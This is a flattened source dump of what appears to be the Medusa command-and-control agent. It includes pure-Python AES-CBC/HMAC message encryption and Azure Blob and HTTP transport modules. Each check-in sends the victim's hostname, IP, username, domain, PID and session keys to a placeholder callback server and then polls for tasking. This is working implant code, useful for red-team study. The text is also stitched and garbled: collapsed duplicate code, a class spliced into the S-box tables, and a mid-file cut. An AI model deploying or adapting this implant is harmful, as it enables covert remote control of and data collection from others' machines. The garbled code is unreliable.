(a & 0x80) else (a << 1) def mix_single_column(a): t = a[0] ^ a[1] ^ a[2] ^ a[3] u = a[0] a[0] ^= t ^ xtime(a[0] ^ a[1]) a[1] ^= t ^ xtime(a[1] ^ a[2]) a[2] ^= t ^ xtime(a[2] ^ a[3]) a[3] ^= t ^ xtime(a[3] ^ u) def mix_columns(s): for i in range(4): mix_single_column(s[i]) def inv_mix_columns(s): for i in range(4): u = xtime(xtime(s[i][0] ^ s[i][2])) v = xtime(xtime(s[i][1] ^ s[i][3])) s[i][0] ^= u s[i][1] ^= v s[i][2] ^= u s[i][3] ^= v mix_columns(s) r_con = ( 0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, ) def bytes2matrix(text): return [list([ord(x) for x in text[i:i+4]]) for i in range(0, len(text), 4)] def bytes2amatrix(text): return [list([x for x in text[i:i+4]]) for i in range(0, len(text), 4)] def matrix2bytes(matrix): return [chr(x) for x in sum(matrix, [])] def xor_bytes(a, b, as_chr=False): out = [] for i, j in zip(a, b): if isinstance(i, basestring): i = ord(i) if isinstance(j, basestring): j = ord(j) out.append(chr(i^j)) if as_chr else out.append(i^j) return out def inc_bytes(a): out = list(a) for i in reversed(range(len(out))): if out[i] == 0xFF: out[i] = 0 else: out[i] += 1 break return bytes(out) def pad(plaintext): padding_len = 16 - (len(plaintext) % 16) padding = bytes(chr(padding_len) * padding_len) return plaintext + padding def unpad(plaintext): padding_len = ord(plaintext[-1]) assert padding_len > 0 message, padding = plaintext[:-padding_len], plaintext[-padding_len:] assert all(p == chr(padding_len) for p in padding) return message def split_blocks(message, block_size=16, require_padding=True): assert len(message) % block_size == 0 or not require_padding return [message[i:i+16] for i in range(0, len(message), block_size)] class AES: rounds_by_key_size = {16: 10, 24: 12, 32: 14} def __init__(self, master_key): assert len(master_key) in AES.rounds_by_key_size self.n_rounds = 
AES.rounds_by_key_size[len(master_key)] self._key_matrices = self._expand_key(master_key) def _expand_key(self, master_key): key_columns = bytes2matrix(master_key) iteration_size = len(master_key) // 4 columns_per_iteration = len(key_columns) i = 1 while len(key_columns) < (self.n_rounds + 1) * 4: word = list(key_columns[-1]) if len(key_columns) % iteration_size == 0: word.append(word.pop(0)) word = [s_box[b] for b in word] word[0] ^= r_con[i] i += 1 elif len(master_key) == 32 and len(key_columns) % iteration_size == 4: word = [s_box[b] for b in word] word = xor_bytes(word, key_columns[-iteration_size]) key_columns.append(word) return [key_columns[4*i : 4*(i+1)] for i in range(len(key_columns) // 4)] def encrypt_block(self, plaintext): assert len(plaintext) == 16 plain_state = bytes2amatrix(plaintext) add_round_key(plain_state, self._key_matrices[0]) for i in range(1, self.n_rounds): sub_bytes(plain_state) shift_rows(plain_state) mix_columns(plain_state) add_round_key(plain_state, self._key_matrices[i]) sub_bytes(plain_state) shift_rows(plain_state) add_round_key(plain_state, self._key_matrices[-1]) return matrix2bytes(plain_state) def decrypt_block(self, ciphertext): assert len(ciphertext) == 16 cipher_state = bytes2matrix(ciphertext) add_round_key(cipher_state, self._key_matrices[-1]) inv_shift_rows(cipher_state) inv_sub_bytes(cipher_state) for i in range(self.n_rounds - 1, 0, -1): add_round_key(cipher_state, self._key_matrices[i]) inv_mix_columns(cipher_state) inv_shift_rows(cipher_state) inv_sub_bytes(cipher_state) add_round_key(cipher_state, self._key_matrices[0]) return matrix2bytes(cipher_state) def encrypt_cbc(self, plaintext, iv): assert len(iv) == 16 plaintext = pad(plaintext) blocks = [] previous = iv for plaintext_block in split_blocks(plaintext): block = self.encrypt_block(xor_bytes(plaintext_block, previous)) blocks.extend(block) previous = block return bytes(b''.join(blocks)) def decrypt_cbc(self, ciphertext, iv): assert len(iv) == 16 blocks = [] 
class medusa:
    def encrypt(self, data):
        # Encrypt-then-MAC with the pure-Python AES above.
        # Output layout: iv + ciphertext + HMAC-SHA256 tag over (iv + ciphertext).
        # Plaintext is returned untouched when keying is disabled or data is empty.
        from hmac import new
        import hashlib
        if self.agent_config["enc_key"]["value"] != "aes256_hmac" or len(data) == 0:
            return data
        key = base64.b64decode(self.agent_config["enc_key"]["enc_key"])
        iv = os.urandom(16)
        ct = AES(key).encrypt_cbc(data, iv)
        tag = new(key, iv + ct, hashlib.sha256).digest()
        return iv + ct + tag

    def decrypt(self, data):
        # Verify the trailing HMAC-SHA256 tag (constant-time) and CBC-decrypt.
        # Wire layout: 36-byte UUID | 16-byte IV | ciphertext | 32-byte tag.
        # Returns "" on empty input or tag mismatch; passes data straight
        # through (decoded) when keying is disabled.
        from hmac import new, compare_digest
        import hashlib
        if self.agent_config["enc_key"]["value"] != "aes256_hmac":
            return data.decode()
        if len(data) == 0:
            return ""
        key = base64.b64decode(self.agent_config["enc_key"]["dec_key"])
        uuid, iv = data[:36], data[36:52]
        ct, tag = data[52:-32], data[-32:]
        expected = new(key, iv + ct, hashlib.sha256).digest()
        if not compare_digest(expected, tag):
            return ""
        return (uuid + AES(key).decrypt_cbc(ct, iv)).decode()
0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2,
    0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73,
    0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB,
    0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79,
    0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08,
    0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A,
    0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E,
    0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF,
    0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16,
)

# Inverse AES S-box: inv_s_box[s_box[x]] == x for all byte values.
inv_s_box = (
    0x52, 0x09, 0x6A, 0xD5, 0x30, 0x36, 0xA5, 0x38, 0xBF, 0x40, 0xA3, 0x9E, 0x81, 0xF3, 0xD7, 0xFB,
    0x7C, 0xE3, 0x39, 0x82, 0x9B, 0x2F, 0xFF, 0x87, 0x34, 0x8E, 0x43, 0x44, 0xC4, 0xDE, 0xE9, 0xCB,
    0x54, 0x7B, 0x94, 0x32, 0xA6, 0xC2, 0x23, 0x3D, 0xEE, 0x4C, 0x95, 0x0B, 0x42, 0xFA, 0xC3, 0x4E,
    0x08, 0x2E, 0xA1, 0x66, 0x28, 0xD9, 0x24, 0xB2, 0x76, 0x5B, 0xA2, 0x49, 0x6D, 0x8B, 0xD1, 0x25,
    0x72, 0xF8, 0xF6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xD4, 0xA4, 0x5C, 0xCC, 0x5D, 0x65, 0xB6, 0x92,
    0x6C, 0x70, 0x48, 0x50, 0xFD, 0xED, 0xB9, 0xDA, 0x5E, 0x15, 0x46, 0x57, 0xA7, 0x8D, 0x9D, 0x84,
    0x90, 0xD8, 0xAB, 0x00, 0x8C, 0xBC, 0xD3, 0x0A, 0xF7, 0xE4, 0x58, 0x05, 0xB8, 0xB3, 0x45, 0x06,
    0xD0, 0x2C, 0x1E, 0x8F, 0xCA, 0x3F, 0x0F, 0x02, 0xC1, 0xAF, 0xBD, 0x03, 0x01, 0x13, 0x8A, 0x6B,
    0x3A, 0x91, 0x11, 0x41, 0x4F, 0x67, 0xDC, 0xEA, 0x97, 0xF2, 0xCF, 0xCE, 0xF0, 0xB4, 0xE6, 0x73,
    0x96, 0xAC, 0x74, 0x22, 0xE7, 0xAD, 0x35, 0x85, 0xE2, 0xF9, 0x37, 0xE8, 0x1C, 0x75, 0xDF, 0x6E,
    0x47, 0xF1, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 0x6F, 0xB7, 0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B,
    0xFC, 0x56, 0x3E, 0x4B, 0xC6, 0xD2, 0x79, 0x20, 0x9A, 0xDB, 0xC0, 0xFE, 0x78, 0xCD, 0x5A, 0xF4,
    0x1F, 0xDD, 0xA8, 0x33,
0x88, 0x07, 0xC7, 0x31, 0xB1, 0x12, 0x10, 0x59,
    0x27, 0x80, 0xEC, 0x5F, 0x60, 0x51, 0x7F, 0xA9, 0x19, 0xB5, 0x4A, 0x0D, 0x2D, 0xE5, 0x7A, 0x9F,
    0x93, 0xC9, 0x9C, 0xEF, 0xA0, 0xE0, 0x3B, 0x4D, 0xAE, 0x2A, 0xF5, 0xB0, 0xC8, 0xEB, 0xBB, 0x3C,
    0x83, 0x53, 0x99, 0x61, 0x17, 0x2B, 0x04, 0x7E, 0xBA, 0x77, 0xD6, 0x26, 0xE1, 0x69, 0x14, 0x63,
    0x55, 0x21, 0x0C, 0x7D,
)


def sub_bytes(s):
    # SubBytes: substitute every state byte through the forward S-box.
    for i in range(4):
        for j in range(4):
            s[i][j] = s_box[s[i][j]]


def inv_sub_bytes(s):
    # InvSubBytes: substitute through the inverse S-box.
    for i in range(4):
        for j in range(4):
            s[i][j] = inv_s_box[s[i][j]]


def shift_rows(s):
    # ShiftRows: rotate row r left by r positions (state stored column-major).
    s[0][1], s[1][1], s[2][1], s[3][1] = s[1][1], s[2][1], s[3][1], s[0][1]
    s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]
    s[0][3], s[1][3], s[2][3], s[3][3] = s[3][3], s[0][3], s[1][3], s[2][3]


def inv_shift_rows(s):
    # InvShiftRows: rotate row r right by r positions.
    s[0][1], s[1][1], s[2][1], s[3][1] = s[3][1], s[0][1], s[1][1], s[2][1]
    s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]
    s[0][3], s[1][3], s[2][3], s[3][3] = s[1][3], s[2][3], s[3][3], s[0][3]


def add_round_key(s, k):
    # AddRoundKey: XOR the round key matrix into the state in place.
    for i in range(4):
        for j in range(4):
            s[i][j] ^= k[i][j]


# xtime: multiply a byte by x (i.e. 2) in GF(2^8), reducing by 0x11B.
xtime = lambda a: (((a << 1) ^ 0x1B) & 0xFF) if (a & 0x80) else (a << 1)


def mix_single_column(a):
    # MixColumns applied to one column (see "The Design of Rijndael", Sec. 4.1.2).
    t = a[0] ^ a[1] ^ a[2] ^ a[3]
    u = a[0]
    a[0] ^= t ^ xtime(a[0] ^ a[1])
    a[1] ^= t ^ xtime(a[1] ^ a[2])
    a[2] ^= t ^ xtime(a[2] ^ a[3])
    a[3] ^= t ^ xtime(a[3] ^ u)


def mix_columns(s):
    for i in range(4):
        mix_single_column(s[i])


def inv_mix_columns(s):
    # InvMixColumns expressed as a preprocessing step followed by MixColumns.
    for i in range(4):
        u = xtime(xtime(s[i][0] ^ s[i][2]))
        v = xtime(xtime(s[i][1] ^ s[i][3]))
        s[i][0] ^= u
        s[i][1] ^= v
        s[i][2] ^= u
        s[i][3] ^= v
    mix_columns(s)


# Round constants for the key schedule.
r_con = (
    0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40,
    0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A,
    0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A,
    0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39,
)


def bytes2matrix(text):
    # Converts a 16-byte block into a 4x4 matrix (list of 4-byte columns).
    return [list(text[i:i+4]) for i in range(0, len(text), 4)]


def matrix2bytes(matrix):
    # Converts a 4x4 matrix back into a 16-byte block.
    return bytes(sum(matrix, []))


def xor_bytes(a, b):
    # Byte-wise XOR of two equal-length byte sequences.
    return bytes(i^j for i, j in zip(a, b))


def inc_bytes(a):
    # Returns a new byte string incremented by one (big-endian, with carry).
    out = list(a)
    for i in reversed(range(len(out))):
        if out[i] == 0xFF:
            out[i] = 0
        else:
            out[i] += 1
            break
    return bytes(out)


def pad(plaintext):
    # PKCS#7 padding up to a 16-byte boundary; always adds at least one byte.
    padding_len = 16 - (len(plaintext) % 16)
    padding = bytes([padding_len] * padding_len)
    return plaintext + padding


def unpad(plaintext):
    # Removes PKCS#7 padding, asserting that every pad byte is consistent.
    padding_len = plaintext[-1]
    assert padding_len > 0
    message, padding = plaintext[:-padding_len], plaintext[-padding_len:]
    assert all(p == padding_len for p in padding)
    return message


def split_blocks(message, block_size=16, require_padding=True):
    # Splits a message into 16-byte blocks.
    assert len(message) % block_size == 0 or not require_padding
    return [message[i:i+16] for i in range(0, len(message), block_size)]


class AES:
    # Pure-Python AES (ECB primitives + CBC mode), used when no crypto
    # library is available on the target.
    rounds_by_key_size = {16: 10, 24: 12, 32: 14}

    def __init__(self, master_key):
        # master_key must be 16, 24 or 32 bytes (AES-128/192/256).
        assert len(master_key) in AES.rounds_by_key_size
        self.n_rounds = AES.rounds_by_key_size[len(master_key)]
        self._key_matrices = self._expand_key(master_key)

    def _expand_key(self, master_key):
        # Standard AES key schedule producing (n_rounds + 1) round-key matrices.
        key_columns = bytes2matrix(master_key)
        iteration_size = len(master_key) // 4
        columns_per_iteration = len(key_columns)
        i = 1
        while len(key_columns) < (self.n_rounds + 1) * 4:
            word = list(key_columns[-1])
            if len(key_columns) % iteration_size == 0:
                # RotWord + SubWord + round constant at each iteration start.
                word.append(word.pop(0))
                word = [s_box[b] for b in word]
                word[0] ^= r_con[i]
                i += 1
            elif len(master_key) == 32 and len(key_columns) % iteration_size == 4:
                # Extra SubWord step for 256-bit keys.
                word = [s_box[b] for b in word]
            word = xor_bytes(word, key_columns[-iteration_size])
            key_columns.append(word)
        return [key_columns[4*i : 4*(i+1)] for i in range(len(key_columns) // 4)]

    def encrypt_block(self, plaintext):
        # Encrypts a single 16-byte block.
        assert len(plaintext) == 16
        plain_state = bytes2matrix(plaintext)
        add_round_key(plain_state, self._key_matrices[0])
        for i in range(1, self.n_rounds):
            sub_bytes(plain_state)
            shift_rows(plain_state)
            mix_columns(plain_state)
            add_round_key(plain_state, self._key_matrices[i])
        # Final round omits MixColumns.
        sub_bytes(plain_state)
        shift_rows(plain_state)
        add_round_key(plain_state, self._key_matrices[-1])
        return matrix2bytes(plain_state)

    def decrypt_block(self, ciphertext):
        # Decrypts a single 16-byte block (inverse round order).
        assert len(ciphertext) == 16
        cipher_state = bytes2matrix(ciphertext)
        add_round_key(cipher_state, self._key_matrices[-1])
        inv_shift_rows(cipher_state)
        inv_sub_bytes(cipher_state)
        for i in range(self.n_rounds - 1, 0, -1):
            add_round_key(cipher_state, self._key_matrices[i])
            inv_mix_columns(cipher_state)
            inv_shift_rows(cipher_state)
            inv_sub_bytes(cipher_state)
        add_round_key(cipher_state, self._key_matrices[0])
        return matrix2bytes(cipher_state)

    def encrypt_cbc(self, plaintext, iv):
        # CBC encryption with PKCS#7 padding; iv must be 16 bytes.
        assert len(iv) == 16
        plaintext = pad(plaintext)
        blocks = []
        previous = iv
        for plaintext_block in split_blocks(plaintext):
            # C_i = E(P_i XOR C_{i-1}); C_0 = IV.
            block = self.encrypt_block(xor_bytes(plaintext_block, previous))
            blocks.append(block)
            previous = block
        return b''.join(blocks)

    def decrypt_cbc(self, ciphertext, iv):
        # CBC decryption; strips PKCS#7 padding.
        assert len(iv) == 16
        blocks = []
        previous = iv
        for ciphertext_block in split_blocks(ciphertext):
            # P_i = D(C_i) XOR C_{i-1}; C_0 = IV.
            blocks.append(xor_bytes(previous, self.decrypt_block(ciphertext_block)))
            previous = ciphertext_block
        return unpad(b''.join(blocks))


class medusa:
    def encrypt(self, data):
        # AES-256-CBC with HMAC-SHA256 (encrypt-then-MAC); output is iv || ct || hmac.
        from hmac import new
        if self.agent_config["enc_key"]["value"] == "aes256_hmac" and len(data)>0:
            key = base64.b64decode(self.agent_config["enc_key"]["enc_key"])
            iv = os.urandom(16)
            ciphertext = AES(key).encrypt_cbc(data, iv)
            hmac = new(key, iv + ciphertext, 'sha256').digest()
            return iv + ciphertext + hmac
        else:
            return data

    def decrypt(self, data):
        # Verifies the HMAC (constant-time) then decrypts.
        # Message layout: uuid(36) || iv(16) || ct || hmac(32).
        from hmac import new, compare_digest
        if self.agent_config["enc_key"]["value"] == "aes256_hmac":
            if len(data)>0:
                key = base64.b64decode(self.agent_config["enc_key"]["dec_key"])
                uuid = data[:36]
                iv = data[36:52]
                ct = data[52:-32]
                received_hmac = data[-32:]
                hmac = new(key, iv + ct, 'sha256').digest()
                if compare_digest(hmac, received_hmac):
                    return (uuid + AES(key).decrypt_cbc(ct, iv)).decode()
                else:
                    return ""
            else:
                return ""
        else:
            return data.decode()

================================================
FILE: Payload_Type/medusa/medusa/agent_code/base_agent/transport_azure_blob.py2
================================================ ### IMPORTS ### import urllib2 import uuid ### CLASS_FIELDS ### blob_endpoint = "BLOB_ENDPOINT_PLACEHOLDER" container_name = "CONTAINER_NAME_PLACEHOLDER" sas_token = "CONTAINER_SAS_PLACEHOLDER" gcontext = None #CERTSKIP ### FUNCTIONS ### def get_blob_url(self, blob_path): return "{}/{}/{}?{}".format(self.blob_endpoint, self.container_name, blob_path, self.sas_token) def put_blob(self, blob_path, data): url = self.get_blob_url(blob_path) try: req = urllib2.Request(url, data=data) req.get_method = lambda: "PUT" req.add_header("x-ms-blob-type", "BlockBlob") req.add_header("Content-Type", "application/octet-stream") req.add_header("Content-Length", str(len(data))) try: resp = urllib2.urlopen(req, context=self.gcontext, timeout=30) except TypeError: resp = urllib2.urlopen(req, timeout=30) try: return resp.getcode() in (200, 201) finally: try: resp.close() except Exception: pass except Exception: return False def delete_blob(self, blob_path): url = self.get_blob_url(blob_path) try: req = urllib2.Request(url) req.get_method = lambda: "DELETE" req.add_header("x-ms-blob-type", "BlockBlob") req.add_header("Content-Type", "application/octet-stream") try: resp = urllib2.urlopen(req, context=self.gcontext, timeout=30) except TypeError: resp = urllib2.urlopen(req, timeout=30) try: return resp.getcode() in (200, 201, 202, 204) finally: try: resp.close() except Exception: pass except Exception: return False def get_blob(self, blob_path): url = self.get_blob_url(blob_path) try: req = urllib2.Request(url) try: resp = urllib2.urlopen(req, context=self.gcontext, timeout=30) except TypeError: resp = urllib2.urlopen(req, timeout=30) try: return resp.read() finally: resp.close() except urllib2.HTTPError as e: if e.code == 404: return b"" return b"" except Exception: return b"" def postMessageAndRetrieveResponseBlob(self, data): formatted_data = self.formatMessage(data) message_id = uuid.uuid4() 
self.put_blob("ats/{}.blob".format(message_id), formatted_data) response = b"" while response == b"": self.agentSleep() response = self.get_blob("sta/{}.blob".format(message_id)) self.delete_blob("sta/{}.blob".format(message_id)) decoded_response = base64.b64decode(response) return self.formatResponse(self.decrypt(decoded_response)) def postMessageAndRetrieveResponse(self, data): return self.postMessageAndRetrieveResponseBlob(data) def getMessageAndRetrieveResponse(self, data): return self.postMessageAndRetrieveResponseBlob(data) def checkIn(self): hostname = socket.gethostname() ip = '' if hostname and len(hostname) > 0: try: ip = socket.gethostbyname(hostname) except: pass data = { "action": "checkin", "ip": ip, "os": self.getOSVersion(), "user": self.getUsername(), "host": hostname, "domain": socket.getfqdn(), "pid": os.getpid(), "uuid": self.agent_config["PayloadUUID"], "architecture": "x64" if sys.maxsize > 2**32 else "x86", "encryption_key": self.agent_config["enc_key"]["enc_key"], "decryption_key": self.agent_config["enc_key"]["dec_key"] } response_data = self.postMessageAndRetrieveResponse(data) if("status" in response_data): UUID = response_data["id"] self.agent_config["UUID"] = UUID return True else: return False def makeRequest(self, data, method='GET'): hdrs = {} for header in self.agent_config["Headers"]: hdrs[header] = self.agent_config["Headers"][header] if method == 'GET': req = urllib2.Request(self.agent_config["Server"] + ":" + self.agent_config["Port"] + self.agent_config["GetURI"] + "?" 
+ self.agent_config["GetParam"] + "=" + data.decode(), None, hdrs) else: req = urllib2.Request(self.agent_config["Server"] + ":" + self.agent_config["Port"] + self.agent_config["PostURI"], data, hdrs) if self.agent_config["ProxyHost"] and self.agent_config["ProxyPort"]: tls = "https" if self.agent_config["ProxyHost"][0:5] == "https" else "http" handler = urllib2.HTTPSHandler if tls else urllib2.HTTPHandler if self.agent_config["ProxyUser"] and self.agent_config["ProxyPass"]: proxy = urllib2.ProxyHandler({ "{}".format(tls): '{}://{}:{}@{}:{}'.format(tls, self.agent_config["ProxyUser"], self.agent_config["ProxyPass"], \ self.agent_config["ProxyHost"].replace(tls+"://", ""), self.agent_config["ProxyPort"]) }) auth = urllib2.HTTPBasicAuthHandler() opener = urllib2.build_opener(proxy, auth, handler) else: proxy = urllib2.ProxyHandler({ "{}".format(tls): '{}://{}:{}'.format(tls, self.agent_config["ProxyHost"].replace(tls+"://", ""), self.agent_config["ProxyPort"]) }) opener = urllib2.build_opener(proxy, handler) urllib2.install_opener(opener) try: try: response = urllib2.urlopen(req, context=self.gcontext, timeout=30) except TypeError: response = urllib2.urlopen(req, timeout=30) out = base64.b64decode(response.read()) response.close() return out except: return "" ### CONFIG ### "Headers": HEADER_PLACEHOLDER, "Sleep": int("CALLBACK_INTERVAL_PLACEHOLDER"), "Jitter": int("CALLBACK_JITTER_PLACEHOLDER"), ================================================ FILE: Payload_Type/medusa/medusa/agent_code/base_agent/transport_azure_blob.py3 ================================================ ### IMPORTS ### import urllib.request import uuid ### CLASS_FIELDS ### blob_endpoint = "BLOB_ENDPOINT_PLACEHOLDER" container_name = "CONTAINER_NAME_PLACEHOLDER" sas_token = "CONTAINER_SAS_PLACEHOLDER" gcontext = None #CERTSKIP ### FUNCTIONS ### def get_blob_url(self, blob_path: str) -> str: return f"{self.blob_endpoint}/{self.container_name}/{blob_path}?{self.sas_token}" def put_blob(self, blob_path: 
str, data: bytes) -> bool: url = self.get_blob_url(blob_path) try: req = urllib.request.Request( url, data=data, method="PUT", headers={ "x-ms-blob-type": "BlockBlob", "Content-Type": "application/octet-stream", "Content-Length": str(len(data)), } ) with urllib.request.urlopen(req, context=self.gcontext, timeout=30) as resp: return resp.status in (200, 201) except Exception: return False def delete_blob(self, blob_path: str) -> bool: url = self.get_blob_url(blob_path) try: req = urllib.request.Request( url, method="DELETE", headers={ "x-ms-blob-type": "BlockBlob", "Content-Type": "application/octet-stream", } ) with urllib.request.urlopen(req, context=self.gcontext, timeout=30) as resp: return resp.status in (200, 201, 202, 204) except Exception: return False def get_blob(self, blob_path: str) -> bytes: url = self.get_blob_url(blob_path) try: req = urllib.request.Request(url, method="GET") with urllib.request.urlopen(req, context=self.gcontext, timeout=30) as resp: return resp.read() except urllib.request.HTTPError as e: if e.code == 404: return b"" return b"" except Exception: return b"" def postMessageAndRetrieveResponseBlob(self, data): formatted_data = self.formatMessage(data) message_id = uuid.uuid4() self.put_blob(f"ats/{message_id}.blob", formatted_data) response = b"" while response == b"": self.agentSleep() response = self.get_blob(f"sta/{message_id}.blob") self.delete_blob(f"sta/{message_id}.blob") decoded_response = base64.b64decode(response) return self.formatResponse(self.decrypt(decoded_response)) def postMessageAndRetrieveResponse(self, data): return self.postMessageAndRetrieveResponseBlob(data) def getMessageAndRetrieveResponse(self, data): return self.postMessageAndRetrieveResponseBlob(data) def checkIn(self): hostname = socket.gethostname() ip = '' if hostname and len(hostname) > 0: try: ip = socket.gethostbyname(hostname) except: pass data = { "action": "checkin", "ip": ip, "os": self.getOSVersion(), "user": self.getUsername(), "host": hostname, 
"domain": socket.getfqdn(), "pid": os.getpid(), "uuid": self.agent_config["PayloadUUID"], "architecture": "x64" if sys.maxsize > 2**32 else "x86", "encryption_key": self.agent_config["enc_key"]["enc_key"], "decryption_key": self.agent_config["enc_key"]["dec_key"] } response_data = self.postMessageAndRetrieveResponse(data) if("status" in response_data): UUID = response_data["id"] self.agent_config["UUID"] = UUID return True else: return False def makeRequest(self, data, method='GET'): hdrs = {} for header in self.agent_config["Headers"]: hdrs[header] = self.agent_config["Headers"][header] if method == 'GET': req = urllib.request.Request(self.agent_config["Server"] + ":" + self.agent_config["Port"] + self.agent_config["GetURI"] + "?" + self.agent_config["GetParam"] + "=" + data.decode(), None, hdrs) else: req = urllib.request.Request(self.agent_config["Server"] + ":" + self.agent_config["Port"] + self.agent_config["PostURI"], data, hdrs) if self.agent_config["ProxyHost"] and self.agent_config["ProxyPort"]: tls = "https" if self.agent_config["ProxyHost"][0:5] == "https" else "http" handler = urllib.request.HTTPSHandler if tls else urllib.request.HTTPHandler if self.agent_config["ProxyUser"] and self.agent_config["ProxyPass"]: proxy = urllib.request.ProxyHandler({ "{}".format(tls): '{}://{}:{}@{}:{}'.format(tls, self.agent_config["ProxyUser"], self.agent_config["ProxyPass"], \ self.agent_config["ProxyHost"].replace(tls+"://", ""), self.agent_config["ProxyPort"]) }) auth = urllib.request.HTTPBasicAuthHandler() opener = urllib.request.build_opener(proxy, auth, handler) else: proxy = urllib.request.ProxyHandler({ "{}".format(tls): '{}://{}:{}'.format(tls, self.agent_config["ProxyHost"].replace(tls+"://", ""), self.agent_config["ProxyPort"]) }) opener = urllib.request.build_opener(proxy, handler) urllib.request.install_opener(opener) try: with urllib.request.urlopen(req, context=self.gcontext, timeout=30) as response: out = base64.b64decode(response.read()) 
response.close() return out except: return "" ### CONFIG ### "Headers": HEADER_PLACEHOLDER, "Sleep": int("CALLBACK_INTERVAL_PLACEHOLDER"), "Jitter": int("CALLBACK_JITTER_PLACEHOLDER"), ================================================ FILE: Payload_Type/medusa/medusa/agent_code/base_agent/transport_http.py2 ================================================ ### IMPORTS ### import urllib2 ### CLASS_FIELDS ### ### FUNCTIONS ### def postMessageAndRetrieveResponse(self, data): return self.formatResponse(self.decrypt(self.makeRequest(self.formatMessage(data), 'POST'))) def getMessageAndRetrieveResponse(self, data): return self.formatResponse(self.decrypt(self.makeRequest(self.formatMessage(data, True)))) def checkIn(self): hostname = socket.gethostname() ip = '' if hostname and len(hostname) > 0: try: ip = socket.gethostbyname(hostname) except: pass data = { "action": "checkin", "ip": ip, "os": self.getOSVersion(), "user": self.getUsername(), "host": hostname, "domain": socket.getfqdn(), "pid": os.getpid(), "uuid": self.agent_config["PayloadUUID"], "architecture": "x64" if sys.maxsize > 2**32 else "x86", "encryption_key": self.agent_config["enc_key"]["enc_key"], "decryption_key": self.agent_config["enc_key"]["dec_key"] } response_data = self.postMessageAndRetrieveResponse(data) if("status" in response_data): UUID = response_data["id"] self.agent_config["UUID"] = UUID return True else: return False def makeRequest(self, data, method='GET'): hdrs = {} for header in self.agent_config["Headers"]: hdrs[header] = self.agent_config["Headers"][header] if method == 'GET': req = urllib2.Request(self.agent_config["Server"] + ":" + self.agent_config["Port"] + self.agent_config["GetURI"] + "?" 
+ self.agent_config["GetParam"] + "=" + data.decode(), None, hdrs) else: req = urllib2.Request(self.agent_config["Server"] + ":" + self.agent_config["Port"] + self.agent_config["PostURI"], data, hdrs) #CERTSKIP if self.agent_config["ProxyHost"] and self.agent_config["ProxyPort"]: tls = "https" if self.agent_config["ProxyHost"][0:5] == "https" else "http" handler = urllib2.HTTPSHandler if tls else urllib2.HTTPHandler if self.agent_config["ProxyUser"] and self.agent_config["ProxyPass"]: proxy = urllib2.ProxyHandler({ "{}".format(tls): '{}://{}:{}@{}:{}'.format(tls, self.agent_config["ProxyUser"], self.agent_config["ProxyPass"], \ self.agent_config["ProxyHost"].replace(tls+"://", ""), self.agent_config["ProxyPort"]) }) auth = urllib2.HTTPBasicAuthHandler() opener = urllib2.build_opener(proxy, auth, handler) else: proxy = urllib2.ProxyHandler({ "{}".format(tls): '{}://{}:{}'.format(tls, self.agent_config["ProxyHost"].replace(tls+"://", ""), self.agent_config["ProxyPort"]) }) opener = urllib2.build_opener(proxy, handler) urllib2.install_opener(opener) try: response = urllib2.urlopen(req) out = base64.b64decode(response.read()) response.close() return out except: return "" ### CONFIG ### "Server": "callback_host", "Port": "callback_port", "PostURI": "/post_uri", "Headers": HEADER_PLACEHOLDER, "Sleep": callback_interval, "Jitter": callback_jitter, "GetURI": "/get_uri", "GetParam": "query_path_name", ================================================ FILE: Payload_Type/medusa/medusa/agent_code/base_agent/transport_http.py3 ================================================ ### IMPORTS ### import urllib.request ### CLASS_FIELDS ### ### FUNCTIONS ### def postMessageAndRetrieveResponse(self, data): return self.formatResponse(self.decrypt(self.makeRequest(self.formatMessage(data), 'POST'))) def getMessageAndRetrieveResponse(self, data): return self.formatResponse(self.decrypt(self.makeRequest(self.formatMessage(data, True)))) def checkIn(self): hostname = socket.gethostname() ip = 
